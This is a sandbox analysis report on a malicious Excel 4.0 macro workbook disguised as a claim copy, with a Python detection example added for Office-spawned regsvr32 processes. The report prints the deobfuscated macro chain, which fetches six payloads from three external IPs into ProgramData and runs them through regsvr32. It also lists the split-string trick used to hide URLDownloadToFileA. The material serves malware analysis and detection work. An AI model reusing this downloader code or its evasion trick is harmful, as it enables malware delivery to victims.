Windows Analysis Report ClaimCopy-539408676-12022021.xlsb
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team |
Jbx Signature Overview |
---|
AV Detection: |
---|
Multi AV Scanner detection for submitted file |
Source: | Virustotal |
Software Vulnerabilities: |
---|
Document exploit detected (process start blacklist hit) |
Source: | Process created |
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample |
Found protected and hidden Excel 4.0 Macro sheet |
Source: | Initial sample; Macro extractor |
Mitre Att&ck Matrix |
---|
Only techniques with matching signatures are listed (count of matching signatures in brackets); the remaining tactic columns of the matrix carried no hits. |
Tactic | Techniques |
---|---|
Execution | Scripting (2), Exploitation for Client Execution (22) |
Privilege Escalation | Process Injection (2) |
Defense Evasion | Masquerading (1), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (1), Process Injection (2), Scripting (2) |
Discovery | Virtualization/Sandbox Evasion (1), Process Discovery (1), File and Directory Discovery (1), System Information Discovery (2) |
Collection | Archive Collected Data (1) |
Command and Control | Encrypted Channel (1), Ingress Tool Transfer (4), Non-Application Layer Protocol (2), Application Layer Protocol (12) |
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner |
---|---|---|
Initial sample | 10% | Virustotal |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
15 URLs checked; all scored 0% and were rated safe (6 by URL Reputation, 9 by Avira URL Cloud). The URL strings themselves were not preserved. |
---|
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted URLs |
---|
6 URLs contacted; none flagged malicious, no antivirus detection listed, reputation unknown for all. The URL strings were not preserved; the six download URLs in the Macro 4.0 Code section are the only URLs the macro requests, and the HTTP Packets section shows exactly six outbound requests. |
---|
URLs from Memory and Binaries |
---|
16 URLs found; none flagged malicious, no antivirus detection listed; reputation high for 7, low for 2, unknown for 7. The URL strings were not preserved. |
---|
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
45.142.211.62 | unknown | Russian Federation | 208861 | RACKTECHRU | false |
158.69.133.78 | unknown | Canada | 16276 | OVHFR | false |
185.82.126.78 | unknown | Latvia | 52173 | MAKONIXLV | false |
All three are the hosts named in the macro's download URLs and were contacted by IP address with no preceding DNS query. The "Malicious: false" verdict is the report's own reputation rating, not a statement about the hosted payload. |
General Information |
---|
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 532685 |
Start date: | 02.12.2021 |
Start time: | 16:09:25 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 6m 54s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | ClaimCopy-539408676-12022021.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 12 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal76.expl.evad.winXLSB@13/5@0/3 |
EGA Information: | Failed |
HDC Information: | Failed |
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
16:10:43 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated samples in Joe Sandbox context |
---|---|
RACKTECHRU | 20 samples listed, every one detected as malicious (sample names, SHA 256 hashes and links not preserved) |
OVHFR | 20 samples listed, every one detected as malicious (sample names, SHA 256 hashes and links not preserved) |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
All five entries were written by C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; file names and file-type strings did not survive extraction, and "Encrypted" is false for every entry. Entries 2 and 4 carry identical hashes, i.e. the same content recorded twice, once rated benign and once malicious. The SSDEEP of entries 1, 2 and 4 is almost identical to that of the submitted sample (shared blocks B5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsU and c6EehCfCZpUHKGXbBKsii), so these are near-copies of the workbook itself rather than downloaded payloads; every download request in this run was refused with HTTP 403 (see Snort IDS Alerts). |
File 1 | |
---|---|
Category: | dropped |
Size (bytes): | 85681 |
Entropy (8bit): | 7.915850776614707 |
SSDEEP: | 1536:wB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUw:Pc6EehCfCZpUHKGXbBKsiit |
MD5: | 4F100E2CEFED046B44EC799015B454EF |
SHA1: | 5149E5D1B5212C77B3548914E9B47D67B4BEA574 |
SHA-256: | D30B441AB0E88A1487F29A80D63E2A4865A3F5DF7854FB8359B354397F807E2C |
SHA-512: | 153581151434815CC17E88D587FF6A6AF8F7154B4A05146453A9814F662C68D79F1063BDD9F789A1DB2F5818D199EF600703F8BC35785B0705332EC231F35A14 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
File 2 | |
---|---|
Category: | dropped |
Size (bytes): | 99418 |
Entropy (8bit): | 7.830598578936149 |
SSDEEP: | 1536:IIB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsU9R9/:I3c6EehCfCZpUHKGXbBKsiiC |
MD5: | 3AEEF9C5D82677775B1050AAF5887584 |
SHA1: | ADEDF2A91DCA207EFFD08EE70BBC8617F17C6557 |
SHA-256: | 1C9878EF462B94000F96372344500F0E43520681A6C82E59646B2E3885D78B75 |
SHA-512: | D9E4572E3D85B897B2939962EF9BE5A6A508F8E2C440AA970FABF35F12A446F181B829F21D3977982E43873C4F1858D6EA51266FFB64C3D1F0C0A9AA1FD101A2 |
Malicious: | false |
Reputation: | low |
File 3 | |
---|---|
Category: | modified |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | false |
File 4 | |
---|---|
Category: | dropped |
Size (bytes): | 99418 |
Entropy (8bit): | 7.830598578936149 |
SSDEEP: | 1536:IIB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsU9R9/:I3c6EehCfCZpUHKGXbBKsiiC |
MD5: | 3AEEF9C5D82677775B1050AAF5887584 |
SHA1: | ADEDF2A91DCA207EFFD08EE70BBC8617F17C6557 |
SHA-256: | 1C9878EF462B94000F96372344500F0E43520681A6C82E59646B2E3885D78B75 |
SHA-512: | D9E4572E3D85B897B2939962EF9BE5A6A508F8E2C440AA970FABF35F12A446F181B829F21D3977982E43873C4F1858D6EA51266FFB64C3D1F0C0A9AA1FD101A2 |
Malicious: | true |
File 5 | |
---|---|
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.4377382811115937 |
SSDEEP: | 3:vZ/FFDJw2fV:vBFFGS |
MD5: | 797869BB881CFBCDAC2064F92B26E46F |
SHA1: | 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B |
SHA-256: | D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185 |
SHA-512: | 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D |
Malicious: | true |
Static File Info |
---|
General | |
---|---|
Entropy (8bit): | 7.831010211626038 |
File name: | ClaimCopy-539408676-12022021.xlsb |
File size: | 99677 |
MD5: | 4b4aacfd637f34a8c9111d80578bf275 |
SHA1: | 86b477fdaa06a4fcd7e863af0b7dc9321b9978e4 |
SHA256: | 04a5fd7cd4e3a83f37c9d9b5152a0985278a9d4a6cd749935fdffd1292fdc49f |
SHA512: | 0e5babb339a32868b4198c7d2d4714638033602f12bb30582766ae4de5feb8ec41b3ba18e2e36476a5676b97d8312f818daeb4364dd81faf3fa567a17a013c31 |
SSDEEP: | 1536:hMB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUfp:Nc6EehCfCZpUHKGXbBKsiiOp |
File Content Preview: | PK..........!...~.............[Content_Types].xml ...(... (ZIP signature and [Content_Types].xml part: an OpenXML container) |
File Icon |
---|
Icon Hash: | e4e2ea8aa4b4b4b4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "ClaimCopy-539408676-12022021.xlsb" |
---|
Indicator fields (summary info, application name, encryption, document streams, ObjectPool, Flash objects, VBA macros) were reported empty; the only executable content is the Excel 4.0 macro sheet below. |
Macro 4.0 Code |
---|
The extractor dumps cells as row,col,content. Read with zero-based row and column indices (so "8,6" is G9), the execution chain sits in column G of the macro sheet, which the final GOTO names Tiposa1:

```
8,6,=Drozd(0,"http://185.82.126.78/397887857128.dat","C:\ProgramData\Volet1.ocx",0,0)
9,6,=Drozd(0,"http://158.69.133.78/397887857128.dat","C:\ProgramData\Volet2.ocx",0,0)
10,6,=Drozd(0,"http://45.142.211.62/397887857128.dat","C:\ProgramData\Volet3.ocx",0,0)
11,6,=Drozd(0,"http://45.142.211.62/397887857128.dat2","C:\ProgramData\Volet4.ocx",0,0)
12,6,=Drozd(0,"http://185.82.126.78/397887857128.dat2","C:\ProgramData\Volet5.ocx",0,0)
13,6,=Drozd(0,"http://158.69.133.78/397887857128.dat2","C:\ProgramData\Volet6.ocx",0,0)
15,6,=EXEC("regsvr32 C:\ProgramData\Volet1.ocx")
16,6,=EXEC("regsvr32 C:\ProgramData\Volet2.ocx")
17,6,=EXEC("regsvr32 C:\ProgramData\Volet3.ocx")
18,6,=EXEC("regsvr32 -e -n -i:&"397887857128"& C:\ProgramData\Volet4.ocx")
19,6,=EXEC("regsvr32 -e -n -i:&"397887857128"& C:\ProgramData\Volet5.ocx")
20,6,=EXEC("regsvr32 -e -n -i:&"397887857128"& C:\ProgramData\Volet6.ocx")
23,6,=HALT()
```

The cells the chain is assembled from: string fragments in column D, the three hosts, the ".dat"/".dat2" suffixes, a RANDBETWEEN call, the REGISTER binding and the entry GOTO:

```
16,3,uRl
17,3,="Mon"
18,3,="URLDownloadTo"
19,3,="JJCCBB"
20,4,185.82.126.78/
21,4,158.69.133.78/
21,6,=RANDBETWEEN(142536473,988879789754)
22,4,45.142.211.62/
22,6,=".dat"
23,4,45.142.211.62/
23,6,=".dat2"
24,4,185.82.126.78/
24,6,=REGISTER(D17&D18,D19&"FileA",D20,"Drozd",,1,9)
25,4,158.69.133.78/
37,6,=GOTO(Tiposa1!G8)
```

Remaining cells (padding values scattered around the sheet):

```
1,1,523 4,9,34543 4,12,43 5,2,ui 5,9,7 5,14,43 6,14,36 7,0,ug 7,1,еу5цу5 8,9,34 8,10,5 9,1,y 9,16,346
10,7,rt 10,8,345 10,9,u 11,2,23 11,7,ertertyh57s5ry 11,11,5 11,12,35 12,1,65 12,2,7 12,9,r67
13,2,mfy 13,7,65 13,10,7 13,14,34 13,15,543 14,0,uh 14,1,y 15,0,7 15,7,65 15,10,ae46 16,2,d7
17,9,dt 17,10,6 17,12,u 17,13,5 18,8,yu 18,10,sb 18,14,5 19,7,f 20,0,7 20,1,7 20,7,523 20,8,u
21,0,md 21,9,s 21,11,m 22,1,7 22,8,6 23,11,4 23,15,46 24,8,23 24,14,6 24,15,43 25,1,567 25,10,23 25,13,5 28,2,756
```

Under the zero-based reading D17 = uRl, D18 = Mon, D19 = URLDownloadTo and D20 = JJCCBB, so the REGISTER call becomes REGISTER("uRlMon","URLDownloadToFileA","JJCCBB","Drozd",,1,9): urlmon!URLDownloadToFileA is bound under the alias Drozd, with the DLL and export names split across cells so that no single cell contains the API name. This is the behaviour behind the "Document exploit detected (UrlDownloadToFile)" signature. The six Drozd calls fetch 397887857128.dat and 397887857128.dat2 from each of the three hosts into C:\ProgramData\Volet1.ocx through Volet6.ocx; the EXEC cells then run regsvr32 on each file, the last three with -n -i:397887857128, i.e. DllInstall is called with the same 12-digit id instead of DllRegisterServer. The host fragments, the suffix cells and the RANDBETWEEN range, which contains that id, are the pieces the download URLs are built from. In this run all six HTTP requests were answered 403 Forbidden (Snort IDS Alerts below), so the six regsvr32 processes listed under System Behavior had no valid payload to load and the analysis ended on timeout.
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
12/02/21-16:10:25.632241 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
12/02/21-16:10:26.574859 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
12/02/21-16:10:29.832836 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
12/02/21-16:10:30.027399 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
12/02/21-16:10:30.211827 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
12/02/21-16:10:30.735520 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 2, 2021 16:10:25.168994904 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 16:10:25.229886055 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 16:10:25.230056047 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 16:10:25.231389046 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 16:10:25.291949987 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 16:10:25.632241011 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 16:10:25.637115955 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 16:10:25.664262056 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 16:10:25.771842957 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 16:10:25.772038937 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 16:10:25.773314953 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 16:10:25.880645037 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 16:10:26.574858904 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 16:10:26.574981928 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 16:10:26.584788084 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 16:10:29.594575882 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 16:10:29.631189108 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 16:10:29.631477118 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 16:10:29.632947922 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 16:10:29.672388077 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 16:10:29.832835913 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 16:10:29.832989931 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 16:10:29.840528011 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 16:10:29.876952887 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 16:10:30.027399063 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 16:10:30.027755976 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 16:10:30.030435085 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 16:10:30.091200113 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 16:10:30.211827040 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 16:10:30.211921930 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 16:10:30.213552952 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 16:10:30.321049929 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 16:10:30.735519886 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 16:10:30.735712051 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 16:11:35.026017904 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 16:11:35.026089907 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 16:11:35.213016033 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 16:11:35.213315964 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 16:11:35.738107920 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 16:11:35.738182068 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 16:12:25.061552048 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 16:12:25.062350035 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 16:12:25.062480927 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 16:12:25.098237038 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 16:12:25.122937918 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 16:12:25.169639111 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49167 | 185.82.126.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2021 16:10:25.231389046 CET | 0 | OUT | |
Dec 2, 2021 16:10:25.632241011 CET | 1 | IN | |
Dec 2, 2021 16:10:30.030435085 CET | 5 | OUT | |
Dec 2, 2021 16:10:30.211827040 CET | 6 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49168 | 158.69.133.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2021 16:10:25.773314953 CET | 1 | OUT | |
Dec 2, 2021 16:10:26.574858904 CET | 2 | IN | |
Dec 2, 2021 16:10:30.213552952 CET | 7 | OUT | |
Dec 2, 2021 16:10:30.735519886 CET | 7 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49169 | 45.142.211.62 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2021 16:10:29.632947922 CET | 3 | OUT | |
Dec 2, 2021 16:10:29.832835913 CET | 4 | IN | |
Dec 2, 2021 16:10:29.840528011 CET | 4 | OUT | |
Dec 2, 2021 16:10:30.027399063 CET | 5 | IN |
System Behavior |
---|
All seven processes started on 02/12/2021; none is a Wow64 (32-bit) process, all have elevated and administrator privileges, all are reported as "Programmed in: C, C++ or other language" with reputation high. Command lines were not preserved; the six regsvr32.exe instances correspond to the six EXEC cells of the macro. |
Start time | Path | Imagebase | File size | MD5 hash |
---|---|---|---|---|
16:10:23 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | 0x13f030000 | 28253536 bytes | D53B85E21886D2AF9815C377537BCAC3 |
16:10:33 | C:\Windows\System32\regsvr32.exe | 0xff0f0000 | 19456 bytes | 59BCE9F07985F8A4204F4D6554CFF708 |
16:10:33 | C:\Windows\System32\regsvr32.exe | 0xff0f0000 | 19456 bytes | 59BCE9F07985F8A4204F4D6554CFF708 |
16:10:34 | C:\Windows\System32\regsvr32.exe | 0xff0f0000 | 19456 bytes | 59BCE9F07985F8A4204F4D6554CFF708 |
16:10:34 | C:\Windows\System32\regsvr32.exe | 0xff0f0000 | 19456 bytes | 59BCE9F07985F8A4204F4D6554CFF708 |
16:10:34 | C:\Windows\System32\regsvr32.exe | 0xff0f0000 | 19456 bytes | 59BCE9F07985F8A4204F4D6554CFF708 |
16:10:35 | C:\Windows\System32\regsvr32.exe | 0xff0f0000 | 19456 bytes | 59BCE9F07985F8A4204F4D6554CFF708 |
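The process chain above (EXCEL.EXE spawning regsvr32.exe on files under C:\ProgramData, three of them with -n -i:<id>) is what the cited Sigma rule generalises. As an added example, not part of the report and not the Sigma rule's own logic, the check below scores process-creation events on an Office parent, a regsvr32 target in a user-writable directory, and the /n and /i: switches. The events are constructed; the regsvr32 command lines are modelled on the macro's EXEC cells, on the assumption that the &"397887857128"& fragment concatenates to -i:397887857128 on the real command line.

```python
# Added example (not from the report): Office -> regsvr32 process-creation check.
import re
from dataclasses import dataclass

OFFICE = {'excel.exe', 'winword.exe', 'powerpnt.exe', 'outlook.exe', 'msaccess.exe', 'mspub.exe'}
SHELLS = {'cmd.exe', 'powershell.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe',
          'regsvr32.exe', 'rundll32.exe', 'certutil.exe', 'msiexec.exe'}
USER_WRITABLE = re.compile(r'\\(ProgramData|Users|Temp|AppData)\\', re.I)
DLLINSTALL = re.compile(r'(?:^|\s)[-/]i:', re.I)          # regsvr32 /i:<arg>: call DllInstall
NO_REGISTER = re.compile(r'(?:^|\s)[-/]n(?:\s|$)', re.I)  # regsvr32 /n: skip DllRegisterServer

@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str

def basename(path):
    return path.replace('/', '\\').rsplit('\\', 1)[-1].lower()

def reasons_for(ev):
    """Return the indicators an event trips, in a fixed order; empty means no alert."""
    hits = []
    if basename(ev.parent_image) in OFFICE and basename(ev.image) in SHELLS:
        hits.append('office_spawns_shell')
    if basename(ev.image) == 'regsvr32.exe':
        if USER_WRITABLE.search(ev.command_line):
            hits.append('regsvr32_user_writable_target')
        if DLLINSTALL.search(ev.command_line):
            hits.append('regsvr32_dllinstall_arg')
        if NO_REGISTER.search(ev.command_line):
            hits.append('regsvr32_no_register')
    return hits

def severity(hits):
    """An Office parent alone is medium; combined with any regsvr32 indicator it is high."""
    if not hits:
        return 'none'
    if 'office_spawns_shell' in hits:
        return 'high' if len(hits) > 1 else 'medium'
    return 'low'

# Constructed events (not taken from the report's logs).
EXCEL = r'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE'
REGSVR = r'C:\Windows\System32\regsvr32.exe'
EVENTS = [
    ProcEvent(EXCEL, REGSVR, r'regsvr32 C:\ProgramData\Volet1.ocx'),
    ProcEvent(EXCEL, REGSVR, r'regsvr32 -e -n -i:397887857128 C:\ProgramData\Volet4.ocx'),
    ProcEvent(r'C:\Windows\System32\msiexec.exe', REGSVR, r'regsvr32 /s "C:\Program Files\Vendor\ctl.ocx"'),
    ProcEvent(r'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE',
              r'C:\Windows\System32\cmd.exe', 'cmd /c whoami'),
]

def triage(events):
    """(command line, indicators, severity) for every event, alerting ones included."""
    out = []
    for ev in events:
        hits = reasons_for(ev)
        out.append((ev.command_line, hits, severity(hits)))
    return out

if __name__ == '__main__':
    for cmd, hits, sev in triage(EVENTS):
        print(f'{sev:6} {cmd}  {hits}')
```

The benign installer-driven registration (msiexec parent, target under Program Files, no /n or /i:) scores nothing, while both Excel-spawned regsvr32 events score high even though a plain "regsvr32 <path>" carries no switches; the user-writable target path is what separates it from ordinary COM registration.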
Disassembly |
---|
Code Analysis |
---|
Executed Functions |
---|
Non-executed Functions |
---|
Function | Relevance | Instructions | Uniqueness Score |
---|---|---|---|
024E66F3 | .8 | 775 (COMMON) | -1.00% |
024E66E8 | .8 | 763 (COMMON) | -1.00% |
024E6753 | .8 | 757 (COMMON) | -1.00% |
024E6743 | .7 | 738 (COMMON) | -1.00% |
024E6340 | .4 | 365 (COMMON) | -1.00% |